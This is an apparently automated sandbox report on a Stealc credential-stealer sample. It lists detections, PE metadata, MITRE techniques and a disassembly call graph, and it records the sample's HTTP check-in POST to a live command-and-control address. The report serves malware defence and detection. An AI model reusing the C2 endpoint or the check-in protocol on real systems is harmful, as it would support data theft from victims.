              Source: Yara matchFile source: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7324, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory641
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe53%VirustotalBrowse
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://185.215.113.206/c4becf79229cb002.php/y100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.php/y19%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                		high
                http://185.215.113.206/false
                  		high
                  185.215.113.206/c4becf79229cb002.phpfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/c4becf79229cb002.php/yfile.exe, 00000000.00000002.1747032810.0000000000576000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 19%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.215.113.206/1file.exe, 00000000.00000002.1747032810.0000000000576000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://185.215.113.206/c4becf79229cb002.php_file.exe, 00000000.00000002.1747032810.0000000000576000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.206file.exe, 00000000.00000002.1747032810.000000000051E000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://185.215.113.206/Lfile.exe, 00000000.00000002.1747032810.0000000000576000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://185.215.113.206/kfile.exe, 00000000.00000002.1747032810.0000000000576000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://185.215.113.206/c4becf79229cb002.phptfile.exe, 00000000.00000002.1747032810.0000000000561000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://185.215.113.206/wfile.exe, 00000000.00000002.1747032810.0000000000576000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.215.113.206
                                  		unknownPortugal
                                  		206894WHOLESALECONNECTIONSNLtrue

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1572084
                                  Start date and time:2024-12-10 04:30:07 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 2m 56s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:1
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 80%
                                  • Number of executed functions: 15
                                  • Number of non-executed functions: 130
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Stop behavior analysis, all processes terminated

                                  Simulations

                                  Behavior and APIs

                                  No simulations

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  185.215.113.206file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/c4becf79229cb002.php
                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                  • 185.215.113.206/c4becf79229cb002.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/c4becf79229cb002.php
                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                  • 185.215.113.206/c4becf79229cb002.php
                                  file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
                                  • 185.215.113.206/c4becf79229cb002.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/c4becf79229cb002.php
                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206/c4becf79229cb002.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/c4becf79229cb002.php
                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206/c4becf79229cb002.php
                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                  • 185.215.113.206/c4becf79229cb002.php

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC StealerBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousAmadeyBrowse
                                  • 185.215.113.43
                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  No created / dropped files found

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.943746327821909
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:1'801'728 bytes
                                  MD5:e814098146a7d5bb6910f684d24ddda7
                                  SHA1:3ac620ff3ae684e4d614ffb27821d8301f973a84
                                  SHA256:8bd7b0662ecb72eb60b3ae68a0534acb4a787263a37a619a48bc7a2186c4415d
                                  SHA512:7d3dced81670b6e318e77057bbad45d5d7d4015f08ba0548e0f52766bf6ec2d874990a2c5003f5c2d48a39801d6c5c5fe26b85cc120b2ab77a7c8f4166588c99
                                  SSDEEP:49152:NC3dgqyRY1d1NYSRu6+dNOpwPSmf9QlPT:4dgNRYX25rSmf2l
                                  TLSH:4E8533CF00EA61A1CEDD57F22A0DDBE891606C4F4D410C439CB3EEAD47963E2539B9A4
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d...d...d.....s.|.....F.i.....r.^...m.[.g...m.K.b.......g...d.........w.w.....E.e...Richd...........PE..L....dTg...........

                                  File Icon

                                  Icon Hash:90cececece8e8eb0

                                  Static PE Info

                                  General

                                  Entrypoint:0xa91000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x67546419 [Sat Dec 7 15:04:57 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                  Entrypoint Preview

                                  Instruction
                                  jmp 00007F055CF8129Ah
                                  subps xmm3, dqword ptr [ebx]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add cl, ch
                                  add byte ptr [eax], ah
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Rich Headers

                                  Programming Language:
                                  • [C++] VS2010 build 30319
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [LNK] VS2010 build 30319

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x1ac.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  0x10000x2490000x168006b1a169eca053694001d98258df97060unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc0x24a0000x1ac0x200011e1f51a4eee2ed7520a545567f5a64False0.576171875data4.524809607454124IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  0x24c0000x2a60000x200ecd9df41da24d1c11d2f53c4686879e6unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  dnuvwdxn0x4f20000x19e0000x19da00db4f9d5a8fcd5e72637c6cf664e3e20cFalse0.9948512815427621data7.953787328423517IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  nviifddd0x6900000x10000x400cbdca69edd61df7297cdd578a01e946dFalse0.7822265625data6.074853675743909IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .taggant0x6910000x30000x22006c5ba68e051dd9e3cf504a5b560b9c4cFalse0.006433823529411764DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                  Resources

                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_MANIFEST0x68f7300x152ASCII text, with CRLF line terminators0.6479289940828402

                                  Imports

                                  DLLImport
                                  kernel32.dlllstrcpy

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-12-10T04:31:05.531407+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.20680TCP

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Dec 10, 2024 04:31:03.624141932 CET4973080192.168.2.4185.215.113.206
                                  Dec 10, 2024 04:31:03.743592978 CET8049730185.215.113.206192.168.2.4
                                  Dec 10, 2024 04:31:03.743737936 CET4973080192.168.2.4185.215.113.206
                                  Dec 10, 2024 04:31:03.743999958 CET4973080192.168.2.4185.215.113.206
                                  Dec 10, 2024 04:31:03.865818977 CET8049730185.215.113.206192.168.2.4
                                  Dec 10, 2024 04:31:05.083565950 CET8049730185.215.113.206192.168.2.4
                                  Dec 10, 2024 04:31:05.083638906 CET4973080192.168.2.4185.215.113.206
                                  Dec 10, 2024 04:31:05.085763931 CET4973080192.168.2.4185.215.113.206
                                  Dec 10, 2024 04:31:05.205485106 CET8049730185.215.113.206192.168.2.4
                                  Dec 10, 2024 04:31:05.531299114 CET8049730185.215.113.206192.168.2.4
                                  Dec 10, 2024 04:31:05.531407118 CET4973080192.168.2.4185.215.113.206
                                  Dec 10, 2024 04:31:07.699397087 CET4973080192.168.2.4185.215.113.206

                                  HTTP Request Dependency Graph

                                  • 185.215.113.206

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.449730185.215.113.206807324C:\Users\user\Desktop\file.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 10, 2024 04:31:03.743999958 CET90OUTGET / HTTP/1.1
                                  Host: 185.215.113.206
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Dec 10, 2024 04:31:05.083565950 CET203INHTTP/1.1 200 OK
                                  Date: Tue, 10 Dec 2024 03:31:04 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Dec 10, 2024 04:31:05.085763931 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----GIJJKFCGDGHDHIECGCBK
                                  Host: 185.215.113.206
                                  Content-Length: 211
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 31 43 38 32 32 45 36 43 41 39 32 31 32 37 33 37 30 37 38 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 2d 2d 0d 0a
                                  Data Ascii: ------GIJJKFCGDGHDHIECGCBKContent-Disposition: form-data; name="hwid"8A1C822E6CA92127370785------GIJJKFCGDGHDHIECGCBKContent-Disposition: form-data; name="build"stok------GIJJKFCGDGHDHIECGCBK--
                                  Dec 10, 2024 04:31:05.531299114 CET210INHTTP/1.1 200 OK
                                  Date: Tue, 10 Dec 2024 03:31:05 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 8
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 59 6d 78 76 59 32 73 3d
                                  Data Ascii: YmxvY2s=


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:22:31:00
                                  Start date:09/12/2024
                                  Path:C:\Users\user\Desktop\file.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                  Imagebase:0x8c0000
                                  File size:1'801'728 bytes
                                  MD5 hash:E814098146A7D5BB6910F684D24DDDA7
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1696046982.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1747032810.0000000000536000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:4.4%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:13.3%
                                    Total number of Nodes:1400
                                    Total number of Limit Nodes:24
                                    execution_graph 30172 8d3d09 244 API calls 30202 8d6709 675 API calls 30132 8e0889 1967 API calls 30173 8e2d00 11 API calls 30182 8e0a80 687 API calls 30203 8e2b00 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 30145 8d7743 1332 API calls 30146 8d86a6 48 API calls 30185 8de219 140 API calls 30192 8c5799 57 API calls 30166 8e3190 GetSystemInfo wsprintfA 30193 8ea2b0 __CxxFrameHandler 30148 8dac12 120 API calls 30149 8e082a 1977 API calls 30133 8c8ca9 malloc strcpy_s 30167 8cf9a9 144 API calls 30134 8e44a0 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 30150 8e2820 10 API calls 30151 8e3420 6 API calls 30186 8e3220 7 API calls 30135 8e84a1 121 API calls 2 library calls 30187 8e0a21 694 API calls 30195 8e93bd 129 API calls 3 library calls 30153 8d2839 290 API calls 30168 8c15b9 200 API calls 30196 8ca3b9 165 API calls 30174 8e4e55 9 API calls 30155 8d5036 295 API calls 30197 8e2bb0 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 30136 8e74ce 6 API calls ctype 30175 8d0549 126 API calls 30204 8d2749 298 API calls 30137 8cd4c9 140 API calls 30156 8e8849 free free malloc free __getptd 30176 8e0946 1957 API calls 30158 8e3040 GetSystemPowerStatus 30177 8e2940 GetCurrentProcess IsWow64Process 30178 8dc559 ShellExecuteEx 30189 8c8e50 malloc strcpy_s free std::exception::exception 30190 8c7650 free ctype 28714 8e1bd0 28759 8c29a0 28714->28759 28718 8e1be3 28719 8e1c09 lstrcpy 28718->28719 28720 8e1c15 GetUserDefaultLangID 28718->28720 28719->28720 28721 8e1c3e 28720->28721 28722 8e1c28 28720->28722 28860 8e2a70 GetProcessHeap RtlAllocateHeap GetComputerNameA 28721->28860 28722->28721 28723 8e1c36 ExitProcess 28722->28723 28725 8e1c6d lstrlen 28730 8e1c85 28725->28730 28726 8e1c43 28726->28725 29065 8e29e0 GetProcessHeap RtlAllocateHeap GetUserNameA 28726->29065 28728 8e1c57 28728->28725 28733 8e1c66 ExitProcess 28728->28733 28729 8e1ca9 lstrlen 28731 8e1cbf 28729->28731 28730->28729 28732 8e1c99 lstrcpy lstrcat 28730->28732 28734 8e1ce0 28731->28734 28735 8e1ccc lstrcpy lstrcat 28731->28735 28732->28729 28736 8e2a70 3 API calls 28734->28736 28735->28734 28737 8e1ce5 lstrlen 28736->28737 28740 8e1cfa 28737->28740 28738 8e1d20 lstrlen 28739 8e1d36 28738->28739 28742 8e1d54 28739->28742 28743 8e1d40 lstrcpy lstrcat 28739->28743 28740->28738 28741 8e1d0d lstrcpy lstrcat 28740->28741 28741->28738 28862 8e29e0 GetProcessHeap RtlAllocateHeap GetUserNameA 28742->28862 28743->28742 28745 8e1d59 lstrlen 28746 8e1d6d 28745->28746 28747 8e1d7d lstrcpy lstrcat 28746->28747 28748 8e1d90 28746->28748 28747->28748 28749 8e1dae lstrcpy 28748->28749 28750 8e1db6 28748->28750 28749->28750 28751 8e1ddc OpenEventA 28750->28751 28752 8e1dee 28751->28752 28753 8e1e14 CreateEventA 28751->28753 28754 8e1df0 CloseHandle Sleep OpenEventA 28752->28754 28863 8e1b00 GetSystemTime 28753->28863 28754->28753 28754->28754 28758 8e1e2d CloseHandle ExitProcess 29066 8c4980 28759->29066 28761 8c29b1 28762 8c4980 2 API calls 28761->28762 28763 8c29c7 28762->28763 28764 8c4980 2 API calls 28763->28764 28765 8c29dd 28764->28765 28766 8c4980 2 API calls 28765->28766 28767 8c29f3 28766->28767 28768 8c4980 2 API calls 28767->28768 28769 8c2a09 28768->28769 28770 8c4980 2 API calls 28769->28770 28771 8c2a1f 28770->28771 28772 8c4980 2 API calls 28771->28772 28773 8c2a38 28772->28773 28774 8c4980 2 API calls 28773->28774 28775 8c2a4e 28774->28775 28776 8c4980 2 API calls 28775->28776 28777 8c2a64 28776->28777 28778 8c4980 2 API calls 28777->28778 28779 8c2a7a 28778->28779 28780 8c4980 2 API calls 28779->28780 28781 8c2a90 28780->28781 28782 8c4980 2 API calls 28781->28782 28783 8c2aa6 28782->28783 28784 8c4980 2 API calls 28783->28784 28785 8c2abf 28784->28785 28786 8c4980 2 API calls 28785->28786 28787 8c2ad5 28786->28787 28788 8c4980 2 API calls 28787->28788 28789 8c2aeb 28788->28789 28790 8c4980 2 API calls 28789->28790 28791 8c2b01 28790->28791 28792 8c4980 2 API calls 28791->28792 28793 8c2b17 28792->28793 28794 8c4980 2 API calls 28793->28794 28795 8c2b2d 28794->28795 28796 8c4980 2 API calls 28795->28796 28797 8c2b46 28796->28797 28798 8c4980 2 API calls 28797->28798 28799 8c2b5c 28798->28799 28800 8c4980 2 API calls 28799->28800 28801 8c2b72 28800->28801 28802 8c4980 2 API calls 28801->28802 28803 8c2b88 28802->28803 28804 8c4980 2 API calls 28803->28804 28805 8c2b9e 28804->28805 28806 8c4980 2 API calls 28805->28806 28807 8c2bb4 28806->28807 28808 8c4980 2 API calls 28807->28808 28809 8c2bcd 28808->28809 28810 8c4980 2 API calls 28809->28810 28811 8c2be3 28810->28811 28812 8c4980 2 API calls 28811->28812 28813 8c2bf9 28812->28813 28814 8c4980 2 API calls 28813->28814 28815 8c2c0f 28814->28815 28816 8c4980 2 API calls 28815->28816 28817 8c2c25 28816->28817 28818 8c4980 2 API calls 28817->28818 28819 8c2c3b 28818->28819 28820 8c4980 2 API calls 28819->28820 28821 8c2c54 28820->28821 28822 8c4980 2 API calls 28821->28822 28823 8c2c6a 28822->28823 28824 8c4980 2 API calls 28823->28824 28825 8c2c80 28824->28825 28826 8c4980 2 API calls 28825->28826 28827 8c2c96 28826->28827 28828 8c4980 2 API calls 28827->28828 28829 8c2cac 28828->28829 28830 8c4980 2 API calls 28829->28830 28831 8c2cc2 28830->28831 28832 8c4980 2 API calls 28831->28832 28833 8c2cdb 28832->28833 28834 8c4980 2 API calls 28833->28834 28835 8c2cf1 28834->28835 28836 8c4980 2 API calls 28835->28836 28837 8c2d07 28836->28837 28838 8c4980 2 API calls 28837->28838 28839 